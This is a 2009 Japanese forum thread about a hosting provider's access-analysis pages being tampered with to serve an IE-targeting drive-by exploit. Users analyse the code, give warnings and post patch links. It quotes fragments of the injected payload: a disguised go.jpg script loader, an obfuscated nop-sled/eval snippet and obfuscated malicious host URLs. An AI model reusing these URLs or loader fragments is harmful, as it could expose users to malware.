【Geno再来?】某有名レンタルサーバがやられた【新手法】

このエントリーをはてなブックマークに追加
1 マンサク(catv?)

xrea.com part146
http://pc11.2ch.net/test/read.cgi/hosting/1246931972/41-42

42 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/07/08(水) 18:33:30 0
563 名前:Name_Not_Found[sage] 投稿日:2009/07/08(水) 18:31:04 ID:???
改ざん?されたらしいほうのところを調査 gifトロイやらなんやら一杯はいってるね。自己解凍cabが偽装されてたりするし
でも大体は最新にアップデートしてればおkかな でも、一番の問題は、これかな
http://1856317799:888/dir2/go.jpg 一見拡張子からjpgファイルっぽいけど、
> more go.jpg
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e
以下長いので略 まぁ、スクリプトが偽装してある、これがまだ回避策のみでパッチがででてない虚弱性 972890 なのかな
ttp://www.microsoft.com/japan/technet/security/advisory/972890.mspx

http://pc11.2ch.net/test/read.cgi/hosting/1246931972/54
54 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/07/08(水) 19:35:03 0
参照元
【アクセス解析】AccessAnalyzer.com Part5【XREA】
http://pc11.2ch.net/test/read.cgi/hp/1234096306/
574 名前:Name_Not_Found[sage] 投稿日:2009/07/08(水) 19:32:26 ID:???
いろいろしらべていくと、あぁなるほど で、
<script src='go.jpg'></script>
で、問題のjpgをスクリプトとして読み込ませてますね 他の関係なさそうなファイル見てみると
if(user.indexOf("msie 6")==-1&user.indexOf("msie 7")==-1)
ともあるので、 これも同じように、IE6とIE7の狙い撃ちかな? わざわざ律儀ですね
でも、whoisとかで調べていくと、hellh.netということで、おそらく、本体は、各種ネトゲのアカウントハックってところでしょうかね
ネトゲやってないと問題ない、なんて思っても、この手のウイルスはレジストラに残ると
ネットワーク重くしたりといろいろうざいんで、対応したほうがいいですね とりあえず俺は大体わかったんで、ここまで
2 ◆SsSSsSsSSs :2009/07/08(水) 22:52:35.71 ID:bWIF6rFY

GENOウイルスチェッカー
http://geno.2ch.tc/
3 イヌガラシ(宮城県):2009/07/08(水) 22:53:04.76 ID:FAdnn4Pv
またエクレアか
4 ヤグルマギク(滋賀県):2009/07/08(水) 22:53:29.68 ID:basrJNVK
★090705 ハード・業界板 ウイルスURL貼り付け荒らし
http://qb5.2ch.net/test/read.cgi/sec2chd/1246751574/

※緊急※ウイルスURLを貼り付ける荒らしがいます★2
http://dubai.2ch.net/test/read.cgi/ghard/1246791764/

むやみやたらと踏む馬鹿共の自己責任だろ
5 チューリップ(大阪府):2009/07/08(水) 22:53:32.57 ID:+nmE7fNJ
きょ…脆弱性
6 ナズナ(中国・四国):2009/07/08(水) 22:53:47.70 ID:5IPKdKc3
まんこおおおお
7 アカシデ(関西地方):2009/07/08(水) 22:54:15.45 ID:/ZcIxxR/
き…脆弱性
8 ナズナ(東京都):2009/07/08(水) 22:54:17.46 ID:fDTf0of6
ニコニコ株主久しぶりに見た気がする
9 オオイヌノフグリ(catv?):2009/07/08(水) 22:54:18.38 ID:MCTfAkr5
ノートン先生大激怒
10 コメツブツメクサ(アラバマ州):2009/07/08(水) 22:54:24.92 ID:w7wrRzeb
HACKED by jggm
11 オンシジューム(西日本):2009/07/08(水) 22:55:06.78 ID:Txr7GUrp
genoタイプではないようだね
12 クレマチス・モンタナ(埼玉県):2009/07/08(水) 22:55:13.87 ID:rcMUjdWU
これもしかしてIEじゃなければ問題無し?  Opera最強伝説
13 シロウマアサツキ(愛知県):2009/07/08(水) 22:55:26.31 ID:6xcUicet
このスレ開いたらログがaviraに検出された
14 ポレオニウム・ボレアレ(愛知県):2009/07/08(水) 22:55:53.38 ID:r9Mdg6gb
ん?これか?

IEをターゲットにした0-day攻撃が発生中 - スラッシュドット・ジャパン
http://slashdot.jp/security/article.pl?sid=09/07/08/0432248
15 ウシハコベ(鹿児島県):2009/07/08(水) 22:56:09.12 ID:/6oMPJkC
xareaかよ なつかしいな
16 ニリンソウ(catv?):2009/07/08(水) 22:56:54.63 ID:PIdyNdha
現状まとめ

623 名前:Name_Not_Found[sage] 投稿日:2009/07/08(水) 22:27:22 ID:???
調べたけど、これ、トロイ→ウイルス本体の二段構成だね
まず、こちらのPCに穴がないか、さまざまなトロイがいくつも試される
そのなかにはGENOと同じ虚弱性をついたものも混ざっている。でも、これはGENOのときにすでに対策されている
だから、最低限、Adobeの更新は必要。

でも今回は、最近みつかった虚弱性をついているトロイがある。これはちゃんと対応していないと処理しきれない

そういうことだろう
go.jpgそのものがウイルス実行ファイルってわけではないが、穴を探しにくるのは気持ちのいいものではないな
17 ねこやなぎ(東日本):2009/07/08(水) 22:58:41.97 ID:6wYF+zSr
どうせVISTA使ってる奴だけには効かないんだろ?
18 ヤマブキ(関西・北陸):2009/07/08(水) 23:00:22.46 ID:NMZOCtoZ
火狐最強伝説
19 シラネアオイ(dion軍):2009/07/08(水) 23:00:34.11 ID:ofCw2Zv/
そもそもネトゲやっていないしウイルス以外の要素でも重くなっていくので問題ない
20 ポレオニウム・ボレアレ(愛知県):2009/07/08(水) 23:01:36.13 ID:r9Mdg6gb
未だにIE6-7かつネトゲやってる馬鹿なんてニュー速には居ないよな?
21 ねこやなぎ(大阪府):2009/07/08(水) 23:01:39.97 ID:fmE6zSQG
firefox使っていれば安心かな?
22 ニリンソウ(東京都):2009/07/08(水) 23:02:17.24 ID:2+0wBipu
hellowork.go.jpg
23 ◆SsSSsSsSSs :2009/07/08(水) 23:02:42.94 ID:bWIF6rFY
24 キブシ(アラバマ州):2009/07/08(水) 23:02:47.65 ID:WeGf0fiJ BE:1821383069-DIA(112000)

もっとど派手なやつ出てこないかね
25 ピンクパンダ(宮城県):2009/07/08(水) 23:03:36.74 ID:eOgX1Xvd
このスレ開いた瞬間にAviraが反応した
26 クレマチス(東京都):2009/07/08(水) 23:06:22.48 ID:eBdDx3N7
元スレはIE使いが多かったから危機感が高く見られてるだけ
スナスケやプニルもエンジンはIE7だか6だったはず
トロイとウィルスの二段構成とか考えたら火狐も最新版にすべきかと
窓2000とXP狙いとはいえ他のOSが安全とはまだ誰も確認できてない

今できることは、アクアナ使いはさっさとサイトから解析外しておくことと
アクアナ公式に飛ばないことだ
27 ウバメガシ(神奈川県):2009/07/08(水) 23:07:05.77 ID:MJf2h0s1
>>2
糞サイト貼り付けんな
28 ハナモモ(静岡県):2009/07/08(水) 23:08:12.01 ID:qeylynoy
>>23
直って無い。不正コード健在。あと現在、トップページにも同じコードがある。

※いずれも219.101.229.188のサーバにのみ存在し、189にはない。
29 ウシハコベ(鹿児島県):2009/07/08(水) 23:10:01.02 ID:/6oMPJkC
>>2
それにひっかかったってだけで 同人板の女どもがうるさかったのを思い出した
ソース見りゃわかるだろ
30 ニリンソウ(東京都):2009/07/08(水) 23:11:52.84 ID:xVFpoxlR
さくらたんがやられたのかと思ってびっくりした
31 ジョウシュウアズマギク(東京都):2009/07/08(水) 23:13:03.82 ID:9R/9zbQa BE:904743397-PLT(12300)

s何番サーバ?
32 ジンチョウゲ(catv?):2009/07/08(水) 23:14:04.07 ID:233QKrwF
感染予防
http://dubai.2ch.net/test/read.cgi/ogame/1245761603/529,530,533
すでに感染してるやつはクリーンインスコ
33 ジョウシュウアズマギク(東京都):2009/07/08(水) 23:18:37.53 ID:9R/9zbQa BE:229777128-PLT(12300)

xreaのアク解のログインページか。
いくつか設置してるけど放置しっぱなしで管理画面にログインしないからいいや。
34 クレマチス(東京都):2009/07/08(水) 23:23:28.23 ID:eBdDx3N7
>>33
バナー踏んだ人が感染する可能性があるよ
放置は自己責任だが、お宅が感染源と呼ばれないようにな
35 ノミノフスマ(愛知県):2009/07/08(水) 23:30:19.37 ID:nQhfEh52
Vistaの俺はまたもや大勝利でいいわけ?
36 サンシュ(catv?):2009/07/08(水) 23:32:04.66 ID:GjGZC5LG
Ping打ったら応答返ってきたぞ

C:\>ping 1856317799

110.165.41.103 に ping を送信しています 32 バイトのデータ:
110.165.41.103 からの応答: バイト数 =32 時間 =192ms TTL=114
110.165.41.103 からの応答: バイト数 =32 時間 =144ms TTL=114
110.165.41.103 からの応答: バイト数 =32 時間 =140ms TTL=114
110.165.41.103 からの応答: バイト数 =32 時間 =150ms TTL=114

110.165.41.103 の ping 統計:
パケット数: 送信 = 4、受信 = 4、損失 = 0 (0% の損失)、
ラウンド トリップの概算時間 (ミリ秒):
最小 = 140ms、最大 = 192ms、平均 = 156ms

仕組みは2進数にして区切るとこうで
1101110|10100101|00101001|01100111
10進数に戻すと110.165.41.103ってことか

js.src = ”http:¥/¥/0x6EA52967:888/dir/show.php”; 部分も同様に16進変換っぽい
37 ハンショウヅル(神奈川県):2009/07/08(水) 23:32:16.90 ID:nvnXgNte
genoも引っかからなかったしこれも大丈夫だろ俺は
38 クレマチス(東京都):2009/07/08(水) 23:33:01.78 ID:eBdDx3N7
VISTAでもセキュリティホール放置とかアップデートしてないのはまずい
デフォにあるUACを切ってる人も要注意だね
IE8も7や6より安全ではあるけどセキュリティーの堅さは未知数

http://pc11.2ch.net/test/read.cgi/hp/1234096306/626
39 ジョウシュウアズマギク(東京都):2009/07/08(水) 23:33:54.42 ID:ZUjBBNYB
IEって8でも拡張子による判断がデフォじゃ無かったな
40 ねこやなぎ(長屋):2009/07/08(水) 23:33:59.13 ID:D+UTJyrg
先日から他のサービスやられて、今度はアクセス解析のほうもやられたか
で、相変わらず会社側は感染事実すら公表してない。
他のスレの書き込み見てもわかるが、もう知らないでは済まない問題なのに。


167 名前:名無しさん@お腹いっぱい。 投稿日:2009/07/07(火) 10:18:30 0
今回、ログイン部分が改ざんされ個人情報が脅かされたわけだろ?

5000件以上の個人情報をデータベース等として所持し事業に用いている事業者は
必然的に個人情報取扱事業者に該当するんだよ。
該当する場合は個人情報保護法に乗っ取った運営をしなければならない。
今回、こういう被害受けたからには、デジロック側が個人情報保護法に基づき総務省に報告義務がある。
まさか登録者5000件未満というわけでも無さそうだし。

それ以外にも、以前にも似たようなことがあったということから、
電気通信事業者としても注意義務違反にあたるかもしれない。
ここらへんは詳細わからないことには判断できないが。

とにかく、このまま放置で済む問題ではないのは確実だ。
41 ウンナンオウバイ(岐阜県):2009/07/08(水) 23:34:51.51 ID:KAuN5waX
VISTAはまた仲間はずれか
42 ウンナンオウバイ(岐阜県):2009/07/08(水) 23:35:52.33 ID:KAuN5waX
岐阜じゃ無いのに岐阜になってるw
43 アマリリス(アラバマ州):2009/07/08(水) 23:37:46.13 ID:bIFwDloz
このすれ関係ある?
マイクロソフト、Windows XP/Server 2003の脆弱性対策ツールを緊急公開
http://tsushima.2ch.net/test/read.cgi/news/1247046149/
44 サンシュ(関西地方):2009/07/08(水) 23:58:12.57 ID:JW5174oe
Video ActiveXコントロールのゼロデイ脆弱性に対応する -INTERNET Watch
ttp://internet.watch.impress.co.jp/docs/special/20090708_300654.html

窓の杜 - 【NEWS】MS、Windows XP/Server 2003のIEに対するゼロデイ攻撃への対策ツールを公開
ttp://www.forest.impress.co.jp/docs/news/20090708_300740.html


vistaの人もIE使ってるなら念のために↓はインストールしておけよ
専用ブラウザとかでIEエンジン使ってる人は多いでしょ
ttp://support.microsoft.com/kb/972890
45 クレマチス・モンタナ(東京都):2009/07/09(木) 00:13:35.79 ID:QL3DS6E2
642 :Name_Not_Found:2009/07/08(水) 23:53:21 ID:???
ノートン先生、>620のトロイだけじゃなくて
Downloader.Fostremとかいうのも遮断してるぞコレ
反応するファイルはgo{1}.jpgで同じだけど。
>623の言うとおり、いろんなウィルスをけしかけて来るみたいだ
VALUE DOMAINやエクセリア自体にアクセスしないに限るな。

自分も有料版のバナー無しだけどスクリプト動くんじゃ同じだから消した。
今までのログ勿体ないけど感染するよりマシだから
しばらくの間ログインも削除もしないで、どこか別のアク解でも借りるよ。
いざ外してみると後味の悪い安心感が何ともははやw
46 レウイシア(愛知県):2009/07/09(木) 00:13:51.61 ID:2d1BQMfW
以前も広告のバーナーに何か仕込まれなかったか?
47 クレマチス・モンタナ(東京都):2009/07/09(木) 00:17:17.48 ID:QL3DS6E2
規模的にもGENO再来な悪寒
48 ハンショウヅル(関東):2009/07/09(木) 01:12:14.04 ID:d4P40oQ2
49 スノーフレーク(大阪府):2009/07/09(木) 02:26:30.30 ID:uVr1I8M7
>>38
> VISTAでもセキュリティホール放置とかアップデートしてないのはまずい

当たり前だろw
どのセキュリティソフト使ってるか以前の問題だわ
50 スィートアリッサム(アラバマ州):2009/07/09(木) 03:30:39.21 ID:pdnnVYXh
xrea使ってるけどここ数年何度も改竄系のトラブルがあるな
金払って使ってるけどだんだんバカらしくなってきたしそろそろ引っ越すか
51 ミヤコワスレ(神奈川県):2009/07/09(木) 03:34:18.14 ID:gVfSGn5l
虚弱性ww
病弱なのかな
52番組の途中ですが名無しです:2009/07/09(木) 03:40:58.45 ID:3idCKVwy
き・・・脆弱性
53 デージー(東京都):2009/07/09(木) 03:43:02.79 ID:9KhFleaF
Xreaは無料垢のHDD容量をいい加減増やせ
54 セイヨウオダマキ(東京都):2009/07/09(木) 03:44:20.83 ID:ZuuuEsJj
xreaは止まってるメールサーバを何とかしろ。
ぶっ壊れたまま放置→ある日突然溜まってたメールが一気に押し寄せる

この間もこの現象喰らって酷い目に遭ったぞ…

…とりあえずマカーでSafariだから今回の件はあんまし関係無さそうだけど…
55 マリーゴールド(東京都):2009/07/09(木) 08:17:18.04 ID:kulj34sq
アクアナスレでの傾向と対策
http://pc11.2ch.net/test/read.cgi/hp/1234096306/705

マジでGENO再来みたいなもんだなこりゃ....公式の対応遅えなー
56 マンサク(東京都)
XPで火狐の人も感染するってアクアナスレに出てビビった

こりゃ鯖ごと撤退しかないな